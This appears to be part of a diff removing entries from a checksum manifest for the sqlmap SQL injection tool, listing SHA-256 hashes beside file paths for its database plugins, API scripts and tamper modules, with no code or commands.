-c0f2622a8aabf630ad486cd4f83909c1f8e807f4bf5ec533a4af1bfe74fb1c28 plugins/dbms/clickhouse/enumeration.py
-06f808b2bcd5469ea962e24ba0cf986527c7ab3e1aa35ef2390d0e62e82ff2b0 plugins/dbms/clickhouse/filesystem.py
-6651471640bec9e2230bac67aeeb13f5329072c9ff3eb6965f1f44d3c82a2964 plugins/dbms/clickhouse/fingerprint.py
-aae6a36ac07bc3e9d5b416f4fc6b26ecb7b9de749d1999787d19ced37b8a7440 plugins/dbms/clickhouse/__init__.py
-aba0f1bdffc77cf64eff26747b6736e18f7dba4c7835c1d55d20ecdc9cf11de6 plugins/dbms/clickhouse/syntax.py
-7887a09e81c0a1d815a3bee946b0a1285b929bc2ffaadd985b0cb487165b4c8d plugins/dbms/clickhouse/takeover.py
-9ca6fccb27cac0037103db6f05b561039c9f6bd280ab2fb87b76e4d52142c335 plugins/dbms/cratedb/connector.py
-ed2c22fc575cdbc1b20241b5699efc7d90828b169dabf4779b678482121a6d31 plugins/dbms/cratedb/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/cratedb/filesystem.py
-ef7eecfd3cca7891e7eaa6e15e92166bcc3fff05a52546b899ebf1eb4e850b8b plugins/dbms/cratedb/fingerprint.py
-069a1b7b6825b1fe1cb4a7308f46e704eb66d212556c4a93e4b32576a53b5710 plugins/dbms/cratedb/__init__.py
-71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/cratedb/syntax.py
-9defe46e7e3859e8a58d26afc1964f74ab81b8158ad2be8817b11abb25dd55ad plugins/dbms/cratedb/takeover.py
-3ab24a5d28021f1bce400811ccc1788d01647387c714a11e43f8fa421805d7b1 plugins/dbms/cubrid/connector.py
-a463c8759d5df45dc5c30196e060f5e13560fe298e2028a2ad2b46e265e9b7d4 plugins/dbms/cubrid/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/cubrid/filesystem.py
-110d5b883c65d101850e6a5d60a97f35717c8dd9497f0cf50689266bd281d956 plugins/dbms/cubrid/fingerprint.py
-469c61617884349128219c270f975b62bede023b4032f36a79e1cf963c147b56 plugins/dbms/cubrid/__init__.py
-2c5ac6eb7f565caafaac5d02bf7334a942d702e444c66d11eadf6556a0ffd718 plugins/dbms/cubrid/syntax.py
-0bdfd0c7a4e7fa9b44ba7d61c5467cb67dcb156417a34e981b264de8ce5e1d55 plugins/dbms/cubrid/takeover.py
-72663e8e920b8f3d26ec45b1071a09168ab01534a976e5afd809a81892218687 plugins/dbms/db2/connector.py
-d2b140c2bccb56d2e53864f296e9a0d222d497a98faee7f8f2bc720f70630ea0 plugins/dbms/db2/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/db2/filesystem.py
-ecba1c2f37301957cb05df2f8e35fd3b149eac8f555655af2cc56d8bc0a625d2 plugins/dbms/db2/fingerprint.py
-14f1e5b39a5edd9b48f64f9e498b2487bd8de5354188716f228819e365a0f932 plugins/dbms/db2/__init__.py
-3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/db2/syntax.py
-874ad3a363f415a9b5b705cb2ec2d76872036ba678bbff5033da6bc1568caff4 plugins/dbms/db2/takeover.py
-67cc525c8aba7200c01f6ae36f26cee7eaa01c0e4cc2c4416a0e59fab595c01a plugins/dbms/derby/connector.py
-a70d01e72a6995d2bca0f72b696b69105791164b03784224ce81d22da0472116 plugins/dbms/derby/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/derby/filesystem.py
-6fcb1878c57e1556b56efd3a665e393d5ce3eb5f427b13050ae2cb51ad64ffb2 plugins/dbms/derby/fingerprint.py
-31c2a2bcf41568d9f5b5911cf81a2ffbe2c1489c1d0ef7f1e3dd87f0f271c85d plugins/dbms/derby/__init__.py
-71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/derby/syntax.py
-d46e36b7d9ddafed9fd9e1190ec5af8f8287293d3d08e0ab352ecfbf231af7bb plugins/dbms/derby/takeover.py
-0be4f17fc009c1d58fb1dbc0ef087d68bef007dd0daaea87e5a6dbda7f385558 plugins/dbms/extremedb/connector.py
-e4e0d604af688794eeb4f81ab796f6fdc103af7de0498993f6424e3fce95875c plugins/dbms/extremedb/enumeration.py
-b1d790a0eeebaeb78820094787458adb676ea519ae38152599f07c859b0d2a2b plugins/dbms/extremedb/filesystem.py
-f75474af2a08c98b26a8eb360c244268766647a69b819c662d7077b4479bc3d4 plugins/dbms/extremedb/fingerprint.py
-f2be0dd78572d6ed26130805974c8663c80e89c3da64c30fe76aad2779a3ef77 plugins/dbms/extremedb/__init__.py
-71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/extremedb/syntax.py
-649c6a04e83b55857c8c98a209b4d40121e9169671b258dfbd4ae6ce993c496f plugins/dbms/extremedb/takeover.py
-e3e66c6fd340cc0887a3582e4e6c73a703f5260d0a8dafdb3fe09e8ace787474 plugins/dbms/firebird/connector.py
-29310d973f238c2d9599ed184122bbaedb4bfa9030f2fe5f37966e946b6053d1 plugins/dbms/firebird/enumeration.py
-797ecc06bad81e6915f838e14246cbf266f77e500dbc8dedb6fbbcff4ac15074 plugins/dbms/firebird/filesystem.py
-75ddf9cb76fdc9a2f4acaa1bd66e5b7218ed1e005cca8b6d20395344e6ade8e4 plugins/dbms/firebird/fingerprint.py
-c0571bba933fac6cbb925ed14bf694ccd3da57c8aed97fa46e262f45e7880c6d plugins/dbms/firebird/__init__.py
-a9a0eba443a0085b94fe7e5b7339fa8346acdeb1cd117d153446eb15e1d6ca7d plugins/dbms/firebird/syntax.py
-d19649cbd5555a936e09c5209742541d96a3647787d51ea13bdce765a6198e64 plugins/dbms/firebird/takeover.py
-d5994d9cd22c4761f995a6b4a7d97757270e8c13467367a47de4d27dbc68057f plugins/dbms/frontbase/connector.py
-d7fb18ae7475d1dd75c09dc3f53d2aea4bd9c7b113b8a1c030d3a510177f113f plugins/dbms/frontbase/enumeration.py
-2e10646b916129a14b0b959a86a072eb41a6b57995fb0ade286eb565c9b09366 plugins/dbms/frontbase/filesystem.py
-7b4420db7796610c0fe3851edfa697dc59e715edb394b1fecb6f1e6e10dd29f7 plugins/dbms/frontbase/fingerprint.py
-97c006d99f6d34a320a4348e9cf8a992917ee6f325272049d753956409d3cdac plugins/dbms/frontbase/__init__.py
-71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/frontbase/syntax.py
-fd9d9030d054b9b74cf6973902ca38b0a6cad5898b828366162df6bdc8ea10d2 plugins/dbms/frontbase/takeover.py
-ed39a02193934768cf65d86f9424005f60e0ef03052b5fea1103c78818c19d45 plugins/dbms/h2/connector.py
-8556f37d4739f8eafcde253b2053d1af41959f6ec09af531304d0e695e3eed6b plugins/dbms/h2/enumeration.py
-080b0c1173ffe7511dc6990b6de8385b5e63a5c19b8d5e2d04de23ac9513a45c plugins/dbms/h2/filesystem.py
-d08c1a912f8334c3e706b598db2869edbb1a291a2ccb00c9523ee371de9db0d0 plugins/dbms/h2/fingerprint.py
-94ee6a0f41bb17b863a0425f95c0dcf90963a7f0ed92f5a2b53659c33b5910b8 plugins/dbms/h2/__init__.py
-9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/h2/syntax.py
-53951b2ba616262df5a24aa53e83c1e401d7829bd4b7386dd07704fd05811de2 plugins/dbms/h2/takeover.py
-f8fe5a55ed20f4f2ab85748b30eb7933359ec2a97a51c9d03335c29451b1589c plugins/dbms/hsqldb/connector.py
-f6f4a4912693ea13c037ecfecb991600ca19a0772dab5156fc0c2ad26dff47da plugins/dbms/hsqldb/enumeration.py
-85ab36bfa27e3722683b2eb4c49f5afe79a58a3d0bde554d443440e471a48285 plugins/dbms/hsqldb/filesystem.py
-1cc469e9129d4ad8a80c0ae8377432d6941bff034b1de2db7c2acf277c4dfdd9 plugins/dbms/hsqldb/fingerprint.py
-a05c96907a7e0a13a9f4797351f1d2799e5a39a2c75e6422752dbafd988849ec plugins/dbms/hsqldb/__init__.py
-9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/hsqldb/syntax.py
-524344f3351b8540025a0859ab25f1ae5c9d8720fb27edd7d33216ae100d6c8c plugins/dbms/hsqldb/takeover.py
-978e29639d756547ff94b54a82c27353c1a9a3f593aa17d887642a42447654d4 plugins/dbms/informix/connector.py
-f3a71fca5986082d562119b9ca9371776fe84c86463e72abe621413b477d8eca plugins/dbms/informix/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/informix/filesystem.py
-0fa903103a82552afee1347ea33c17d4043f8c7b5d3261bba600fd6f7de224dd plugins/dbms/informix/fingerprint.py
-3354ff1989eb37845d271b4ce805b87c0e4bf3da3f341ab055ee1ad1c53cb244 plugins/dbms/informix/__init__.py
-27b17bf30d941a4c69ee4feceb4f73d65e4fa670cc20583f73902985025407f8 plugins/dbms/informix/syntax.py
-874ad3a363f415a9b5b705cb2ec2d76872036ba678bbff5033da6bc1568caff4 plugins/dbms/informix/takeover.py
-4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/dbms/__init__.py
-1b0a9b61d0a8f785a320145aba3d8e0f27b2c0c26714c2faa1fc206e2044e437 plugins/dbms/maxdb/connector.py
-477b9096f899e89670bb0825edba9992ea8489ca474d435a022d11dcf2c87444 plugins/dbms/maxdb/enumeration.py
-bf0457ede8723646932efa5bef5fea81f25c202731e6562f94688f4aca1e6f07 plugins/dbms/maxdb/filesystem.py
-ee89da0d8f5a410009ddc257cde63782724b44dacc623b7592ce8f4da64f0797 plugins/dbms/maxdb/fingerprint.py
-586facbacac81503933c2e51819c3c1404090b035efbe7f4fd9ceb15c520e51e plugins/dbms/maxdb/__init__.py
-71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/maxdb/syntax.py
-7ebb34e4073af1f572c19365b6982a6c172c08fe02c52b97b9a642a7333763b5 plugins/dbms/maxdb/takeover.py
-324ee614523fb204d82332f6d332fca3a333fc49c437ca108b7cb96964c1b59e plugins/dbms/mckoi/connector.py
-d6049f27ce3243988081b28d6ce09a5dd47addd00ad97f5c3d388956101baba6 plugins/dbms/mckoi/enumeration.py
-bd90f82ce5d733e98292f00457e65526c996b5462b43644601f3d1d922407d77 plugins/dbms/mckoi/filesystem.py
-8f6a6bc82f5f626838862e255bffca3b8304703054e51f1b373ae0714ad3d58f plugins/dbms/mckoi/fingerprint.py
-3fcced127cd0b24a4f5e6cbaa3c7bcf5869c20ecc4720103f83a4fcfe2320f81 plugins/dbms/mckoi/__init__.py
-71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/mckoi/syntax.py
-f150ce95097d189d930032d5b2e63b166bcf9e438f725aed90c36e5c393793ec plugins/dbms/mckoi/takeover.py
-237615b40daa249a74898cfea05543a200e6ec668076bb9ee57502e1cee2b751 plugins/dbms/mimersql/connector.py
-9bc55b72f833a71b978a64def32f9bb949c84cf059e953a7ba7f83755714bee1 plugins/dbms/mimersql/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/mimersql/filesystem.py
-02ad6eb9837e7a455991f8061287e3ef3e0346d7d4e01005f2dd649dd3c2fb2c plugins/dbms/mimersql/fingerprint.py
-e70a35787a176b388dae2b8124433a11ac60e4b669fd18ebf81665a45233363a plugins/dbms/mimersql/__init__.py
-bc7e155bd1cc573fd4144ba98cce34f41bae489208acd3db15d1c36115bf23f8 plugins/dbms/mimersql/syntax.py
-2dea7308e4ddd3083c7b2e9db210b7cc00f27f55692b2a65affdf5344e2838df plugins/dbms/mimersql/takeover.py
-6e8f5af31a455afdea26c30652a3f112d1627904d263bebfc13849d86d52b5a9 plugins/dbms/monetdb/connector.py
-74e3dadf825ad4320c612e1ee0340c4af4fb566998cd63c087a5525f6786c55c plugins/dbms/monetdb/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/monetdb/filesystem.py
-e60096fe9263392470ba3ca4761b9f2f7768c99b41d2ac688b052ab0fc186f82 plugins/dbms/monetdb/fingerprint.py
-bdf70ec72d76a94e60b3a7fefe732184fb85fde5c067a671f7fa4ae80e8cc10c plugins/dbms/monetdb/__init__.py
-a1cf9a8cd5e263d1e48dc8b5281febaf868ee91f1e0587dee915949fdb6da1ea plugins/dbms/monetdb/syntax.py
-84d9f336ff3d75a1127c7f5ccda7bff6dac947d7d8bbeee2014e8a29b984a98d plugins/dbms/monetdb/takeover.py
-545fbbb386ab7819261a3917d0f016d723dbced8e065945ba60271a73544c459 plugins/dbms/mssqlserver/connector.py
-2895d14ead30d7ee4e1fdb29a8d1d059493ad60490ed2e9ff6cb9680257554cd plugins/dbms/mssqlserver/enumeration.py
-89cbc49cd9113e9ba91be090f79c0384089d1bfed785ac8ee5b07f84309c74cb plugins/dbms/mssqlserver/filesystem.py
-87a35cadd3fe4987f548f498c442f748cf1f37650fd1dcd8decd1455a90d675c plugins/dbms/mssqlserver/fingerprint.py
-784d6065921a8efbba970864a2cb2e0ef1dd1fcea7181cfc3f737bbfa18f0574 plugins/dbms/mssqlserver/__init__.py
-79a887b5a2449bb086805560ff0ec2a2304dd142f47450ae9c2f88cf8bda9ac9 plugins/dbms/mssqlserver/syntax.py
-bb0edf756903d8a9df7b60272541768102c64e562e6e7a356c5a761b835efde3 plugins/dbms/mssqlserver/takeover.py
-d471eb61a33bd3aa1290cdcce40a5966ebc84af79970f75e8992a2688da4be42 plugins/dbms/mysql/connector.py
-1e29529d6c4938a728a2d42ef4276b46a40bf4309570213cf3c08871a83abdc1 plugins/dbms/mysql/enumeration.py
-200b2c910e6902ef8021fe40b3fb426992a016926414cbf9bb74a3630f40842d plugins/dbms/mysql/filesystem.py
-425ae4b571ba4ffece3a15981a1382ccb59378b06a05b46981e6ace0e33bd0ea plugins/dbms/mysql/fingerprint.py
-88daad9cf2f62757949cb27128170f33268059e2f0a05d3bd9f75417b99149de plugins/dbms/mysql/__init__.py
-20108fe32ae3025036aa02b4702c4eda81db01c04a2e0e2e4494d8f1b1717eca plugins/dbms/mysql/syntax.py
-91f34b67fe3ad5bfa6eae5452a007f97f78b7af000457e9d1c75f4d0207f3d39 plugins/dbms/mysql/takeover.py
-4b04646298dfe366c401001ab77893bcd342d34211aec1164c6c92757a66f5f4 plugins/dbms/oracle/connector.py
-8866391a951e577d2b38b58b970774d38fb09f930fa4f6d27f41af40c06987c1 plugins/dbms/oracle/enumeration.py
-5ca9f30cd44d63e2a06528da15643621350d44dc6be784bf134653a20b51efef plugins/dbms/oracle/filesystem.py
-b1c939e3728fe4a739de474edb88583b7e16297713147ca2ea64cac8edf2bdf5 plugins/dbms/oracle/fingerprint.py
-53fe7fc72776d93be72454110734673939da4c59fecdf17bbbc8de9cdc52c220 plugins/dbms/oracle/__init__.py
-39611d712c13e4eb283b65c19de822d5afa4a3c08f12998dd1398725caf48940 plugins/dbms/oracle/syntax.py
-cd3590fbb4d500ed2f2434cf218a4198febb933793b7a98e3bb58126839b06f1 plugins/dbms/oracle/takeover.py
-ec17431637c2329b42ce0d0dd932bbb02aa93d5388a4e1c6f4e0c1b59f27ce00 plugins/dbms/postgresql/connector.py
-3ebc81646f196624ec004a77656767e4850f2f113b696f7c86b5ca4daf0ee675 plugins/dbms/postgresql/enumeration.py
-760285195bdfd91777066bf2751c897f87fab1ada24f729556b122db937c7f88 plugins/dbms/postgresql/filesystem.py
-42fbf2707e9f67554571e63ef2d204d28303e4d25eb7781ec800084fb53324ce plugins/dbms/postgresql/fingerprint.py
-4c76ebe0369647f95114a7807e08cd0821d3f5b7159a3ec659d33ef8175163f7 plugins/dbms/postgresql/__init__.py
-04f8ce5afb10c91cfb456cf4cce627b5351539098c4ddfeb63311a55951ac6b0 plugins/dbms/postgresql/syntax.py
-33f5a6676380cdd4dfbe851b5945121399a158a16ad6b6760b931aa140a353e2 plugins/dbms/postgresql/takeover.py
-ba4c83075ac870473ca91144641c18bc2ca1bf7d7ef5593e4666d95dc9f659d3 plugins/dbms/presto/connector.py
-5b8a46ac204080f1a357dac634330449020d122b4bf84e1c1e9618dc88a8e8a6 plugins/dbms/presto/enumeration.py
-3d65033809b919f6ec53ef93f9cdc2b35304014bc261e5c06b26ab52ded9b4c2 plugins/dbms/presto/filesystem.py
-cb0eb626dc3467e6adbba46f382f9a370397736312f5b50d39593ce3b84bd01c plugins/dbms/presto/fingerprint.py
-90e5500ad15c12394c6bf684d1b85085d6ddad9d2bc2df6ccb2b11be3e21940f plugins/dbms/presto/__init__.py
-3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/presto/syntax.py
-ffd5471d633ecc4bd55ba3674819aec0602ba92812c191d4c1dc468a3263a9f5 plugins/dbms/presto/takeover.py
-c122c48253d90a312962dd48ed47847d86df2b199e34133b70ec78d7b385179b plugins/dbms/raima/connector.py
-aeeedd464149ad6cfc0dab35b7c7b096a186b4b7ea02641ffa92306d1789f36c plugins/dbms/raima/enumeration.py
-3bcd38e900e7c8b53bcbd62dad03f8fa5df04910d96b09115e670302c80b61fc plugins/dbms/raima/filesystem.py
-e5b680e2668313a8b3d4567e2394b557a7db407c4f978f63a54c41b8d786d4b1 plugins/dbms/raima/fingerprint.py
-48a9d1576247b555ed6d910b047f757dea10242ddeb19c7a69a6183a4724dc27 plugins/dbms/raima/__init__.py
-9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/raima/syntax.py
-543949cee45ae5cfb36ad38a82666f211d4f8d0ecf224c6ebb13a8d2455441e1 plugins/dbms/raima/takeover.py
-3038aa55150688855fb4ea5017fe3405a414f2cf4a7630764b482d02f7442b25 plugins/dbms/sqlite/connector.py
-6736ff9995db5675bb82bf2014117bdc5ce641f119b79763edb7aa983443ec87 plugins/dbms/sqlite/enumeration.py
-e75cf970d5d76bc364d2fd02eab4086be6263d9c71fa5b44449bada158cd87d3 plugins/dbms/sqlite/filesystem.py
-c952f1848b7b9bef7c9cd40460849e805d19646e859ad4dac6ebb9f45573447d plugins/dbms/sqlite/fingerprint.py
-9b00c84f7b25b488a4cbb45fe9571e6661206771f1968f68badc0c670f042a0b plugins/dbms/sqlite/__init__.py
-5457814ccacf9ca75ae6c39f1e615dd1ca63a8a2f21311f549f8a1df02d09634 plugins/dbms/sqlite/syntax.py
-3aeb29f4486bd43b34afe58f581cb19a9932cabc87888416d2e383737b690072 plugins/dbms/sqlite/takeover.py
-210da495985643e1952edac123f4b0b963545ecb4c10ce7b9421e8ae101d37b7 plugins/dbms/sybase/connector.py
-8fbdfd90b980cae6d86d9a4e193644655e0820885bb8d2c847930a1dfa7185d2 plugins/dbms/sybase/enumeration.py
-cc237effd49ab53317d8d4b6fad41eef72de7e8f241d9264a65427846ff0c853 plugins/dbms/sybase/filesystem.py
-3dabc716f6603b83767c579b9237352b9f4860110f83e47dc6b0d8720c6ca91d plugins/dbms/sybase/fingerprint.py
-cf21209a5efb9ed2d1c682197f0cd12d514c8c38a7d629f4d66306da8975e300 plugins/dbms/sybase/__init__.py
-87c27c7839d6bc4f7bc1dbe44eb7dcca9d2d68ee744f3e2edf6fac3e80f18088 plugins/dbms/sybase/syntax.py
-3795dbe49e08fe6a9251ec6ce44e3c323138ffc38dfed93db35220b442faf03b plugins/dbms/sybase/takeover.py
-b8adf2e7d9921ff47a4a15f58b4a8665995f5ea079e8843556a11995678a606e plugins/dbms/vertica/connector.py
-c6d4c5bf1d6e3420e0b009e44b70f52db4a6d509451188ca9f7c2b0b73608080 plugins/dbms/vertica/enumeration.py
-15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/vertica/filesystem.py
-2bc1e4f5b3465e776f377f9ede48de79ed588f74b3cbd12e17868440a4b09c1b plugins/dbms/vertica/fingerprint.py
-40a381a9d3a2aeae08321390263d078d1e84212f13b7291ae09fc3b9c91f4cdf plugins/dbms/vertica/__init__.py
-e2b7aad0f739b82eef819202d1543983bd461255e3a2ac7bb66849df75728e2a plugins/dbms/vertica/syntax.py
-b57d7ae86b5531813aca7ffe11668b8a62ace3e2f8c69dbceca67fbf3cde42ee plugins/dbms/vertica/takeover.py
-b17f7ce72b5aa061caf1d0f1fc3510b3a1fa6f382a2d7115ed76dcab271a7507 plugins/dbms/virtuoso/connector.py
-a5aa977e1a20b0e8b57cd1369d3071812415904008d533190f00fd13cd26aec9 plugins/dbms/virtuoso/enumeration.py
-7148d747b1e76b5c508180dc5a6015f39fdea047d7386784b8dc8a8dad965fd3 plugins/dbms/virtuoso/filesystem.py
-01ef324069c3d0a5f50f2916654cdc5c283e59600863820cc55af9d928a55325 plugins/dbms/virtuoso/fingerprint.py
-6e355c60fbb131d1190d993732198989f3d17db21cb3b55edaaf586d49cd6807 plugins/dbms/virtuoso/__init__.py
-3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/virtuoso/syntax.py
-f00e5d1d8ddedcb7980b442d5cabf8bf1c7783c289e32c57a7107f37a3fb40a5 plugins/dbms/virtuoso/takeover.py
-25ed1b975dd09a9224056a02e1f7997512da13eb1aa45222cb817928c681f474 plugins/generic/connector.py
-b333c73c6a490b5930a09c6c09951af1044eb97076446b2f1475c7cfdfc838a6 plugins/generic/custom.py
-4a923f52e8d2dfa6b55c16e08fd5f64eeb292b99573030c0397c7292a4032dd3 plugins/generic/databases.py
-9b0dbf8f77f190ca92cc58e9c5f784d0b30276ee7d99906f6d9c826c23b6d2e1 plugins/generic/entries.py
-783a17bb5188b6b9f4a73dbf10d5cf5c073144d5c1970a9d4aec27cb828e2356 plugins/generic/enumeration.py
-5dbcb646c03b43d1f26c0dbd17ae8fb537fdc526ca9984e1cc3e9eae12c38e6e plugins/generic/filesystem.py
-ab661b605012168d72f84a92ff7e233542df3825c66714c99073e56acea37e2e plugins/generic/fingerprint.py
-4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/generic/__init__.py
-9ec577d8ccf4698d4e7834bf1e97aea58fba9d2609714b7139c747bcc4f59a30 plugins/generic/misc.py
-546486bd4221729d7d85b6ce3dbc263c818d091c67774bd781d7d72896eb733b plugins/generic/search.py
-9be0e2f931b559052518b68511117d6d6e926e69e463ddfa6dc8e9717c0ca677 plugins/generic/syntax.py
-7bb6403d83cc9fd880180e3ad36dca0cc8268f05f9d7e6f6dba6d405eea48c3a plugins/generic/takeover.py
-115ee30c77698bb041351686a3f191a3aa247adb2e0da9844f1ad048d0e002cd plugins/generic/users.py
-4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/__init__.py
-f5cad477023c8145c4db7aa530976fc75b098cf59a49905f28d02f6771fd9697 README.md
-535ab6ac8b8441a3758cee86df3e68abec8b43eee54e32777967252057915acc sqlmapapi.py
-168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62 sqlmapapi.yaml
-a40607ce164eb2d21865288d24b863edb1c734b56db857e130ac1aef961c80b9 sqlmap.conf
-822b706e791eba9b994b08e7600a3adfc3843d360437edfa0bfd588a1f58a13c sqlmap.py
-82caac95182ac5cae02eb7d8a2dc07e71389aeae6b838d3d3f402c9597eb086a tamper/0eunion.py
-bc8f5e638578919e4e75a5b01a84b47456bac0fd540e600975a52408a3433460 tamper/apostrophemask.py
-c9c3d71f11de0140906d7b4f24fadb9926dc8eaf5adab864f8106275f05526ce tamper/apostrophenullencode.py
-fa18d565b7b6b1000942414d65aea762b20632079ed3e1a96fe1005f81fccf07 tamper/appendnullbyte.py
-627573bd838cba4c0b688b401ecbc11a15969bd6ded0d2d7e838d622ffe40b99 tamper/base64encode.py
-5714dddccd9a94238e58737f8b2ee1a272100037a8360342080f865cc7aa3a4d tamper/between.py
-e8964badea5a1026da0e67e2b810297e4d2e45c64aee5192d2c5979feae93e69 tamper/binary.py
-6dce750c7eb79ddc8743d44233045e7804a4191c9523614e8ee187f1696bb655 tamper/bluecoat.py
-4186cf796e0b62c6de81902c33139abd9091725567f49b0f198a1f890f3b9d82 tamper/chardoubleencode.py
-71077c3a28ba68d91baa538e08ca3ba55107f607618269261a0dc0858918b236 tamper/charencode.py
-60ba0b3d985394a962daa097faa31afb80d5ba93dbd495104a519559386c7350 tamper/charunicodeencode.py
-5ec4038bd71c806b903086ad1e099f72c319c7a3b31c4cdf91c97d1fb9d0bdd7 tamper/charunicodeescape.py
-9ad1ee5f134e0fa4f3b16b3622e66f212ffd658b099ef75eaaa96d7a63c2fc2e tamper/commalesslimit.py
-b28bbe837dc70b935143650d907832038aaec19595a93de96d68131c830e2490 tamper/commalessmid.py
-b94713ce6a47d810dd699a480e14e0fd6e6095778d74e5a69e867440ddb1ce66 tamper/commentbeforeparentheses.py
-beb5d4129badba301e0cad26652b05af9220921fd99e72c8d5789c2f75c7f171 tamper/concat2concatws.py
-cd86b89c63932b7ce204cd80c6d0141ac4bb564b8ea5d1b9eb24a8407431f50f tamper/decentities.py
-252a97217f6d3ddd227a1e997cd30f8e0fdc21e235e23307e2bdee96a110c4c6 tamper/dunion.py
-853de839258e9137b252fb61429e7353ea9f8b555d050244333836bd99981324 tamper/equaltolike.py
-a50b70dd62ee00896c46581d81b1b51bedcec303cb5df2f6c6d98c2817608650 tamper/equaltorlike.py
-89803e274257d906e7472a91e60ea0fd0fb4a846eb68dd66b73d298a81a88ee1 tamper/escapequotes.py
-e65a98f6b043401fc0b37c821ef9a459e476df33f9dc885756f08c711b4045a1 tamper/greatest.py
-a7c656e8a2e09541f435931266c6c9fb20b0cf868f70fb77bff0402e73150a56 tamper/halfversionedmorekeywords.py
-af421c0f873e76c2f7182310066d16c7bf14bdda0e79b0eb3cf07be0eca234ed tamper/hex2char.py
-4e5d509fb552f92b70f48346df07987ebd7380f92b419d5316b72d07a172b037 tamper/hexentities.py
-ae95bef04799cd112e81e8527b88669092996243ce161df85ded36fcda188ae6 tamper/htmlencode.py
-fa34e56b7b6578a4611973f273dabac7532672188f2b14a5a68504abb4873d40 tamper/if2case.py
-392f14be8826c59cbace4f4ef4e02f3b4c9fa85892aa2c33b8bf9ec8bb67bda5 tamper/ifnull2casewhenisnull.py
-3a4679f864cffab5f0d0b60a0d0ffdba4adfaba489c07f019d83e0d911dedd1e tamper/ifnull2ifisnull.py
-d22f2208649ffc72e2a80f464eacbe35157e1ebebe7889ae9aea3748116a96b7 tamper/informationschemacomment.py
-4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 tamper/__init__.py
-5fb731d9c0340bd97bc6f647325cf624e7387ae44ce5920ae14c47d007ceb7ea tamper/least.py
-a108d0943a17e5e9d3e256ed58a9e1a15327286c6d5a63bf6aad276fb28216ef tamper/lowercase.py
-19a1ef76b21931a5e688771a341dc46325129414badc0fbf8c6e35fcce2bd7c0 tamper/luanginxmore.py
-f85b74c64441d038198da6b569c050aafd3a0575504c6d0d07d09cdca663692a tamper/luanginx.py
-2f1819436c68d2bbb69380508becf8660bddc2cab9349d30c46b0ab727ba7dec tamper/misunion.py
-6a2d6cf5d7dc6eb838d0ea8a8e5748db14dd8a415fad0994ab0f05bfe87ed5a5 tamper/modsecurityversioned.py
-712a2f7a8f68d16bc77a5e8772098f168207a6815b71a027c2f241655d616102 tamper/modsecurityzeroversioned.py
-458fbf5ae865f3b3de237790de1f7045a820d409649a244c8cc2402fa9582c21 tamper/multiplespaces.py
-d8e049d1c0b4273bb6cee844767503a60f97301a7041e5c8b51cb0557c413d28 tamper/ord2ascii.py
-cf7a99f5a4d6df30b1b8c0df55eb6e950077ec14b31062dd21d2c2d924d58d74 tamper/overlongutf8more.py
-381b5fc6fdda0cd287dd6bf2d098c318fab8f42f5ae3ec4e774e864bf57fd51d tamper/overlongutf8.py
-965636cef15f4b5d1ce2d802e1be8b51025ee95f96b58ae0131340945e9c7026 tamper/percentage.py
-97b6c357c42308fa76d93d271824e53f436fceb33f9a7e74acc8b91da3abb7f4 tamper/plus2concat.py
-d49fd12b78fb6f38c4a31c9c7badaf11f65600127783ebb4e941ab0ed2284489 tamper/plus2fnconcat.py
-2edf00005991d6546c0ddcab103451ae9425c177bc5519d16b2a78e3e308ec71 tamper/randomcase.py
-3259e9189a5d3c2ab476653bc65e45dc481f7541d2688cc8041281ce57205681 tamper/randomcomments.py
-8abd8df65c852011a73ffe69febce52f2d383cdb947a70de0ddb2a0f1272e6f6 tamper/schemasplit.py
-fc90359a31849c890399f146e5f26edf78f6729cabe022cc49748835a870c16c tamper/scientific.py
-387236175825c1651bbf353e7a5553417da9898e60c6e32b302c214ca4ac583f tamper/sleep2getlock.py
-8de7553f15e7ecee5f0da426829dcd73397889645cb43fc9c47d9e5f122c9524 tamper/space2comment.py
-a958305e53d9ca98014918c415d0671e46ca45c6a32762c379e96ab946e75db0 tamper/space2dash.py
-3e99a94e0712906558e346b97d3fdad4e9b349b58f7273e6f9340333774eb71a tamper/space2hash.py
-f5eb72cc564abba171a881fd8b8335bc19efc8333396575db8f18ce0ca8d1e9f tamper/space2morecomment.py
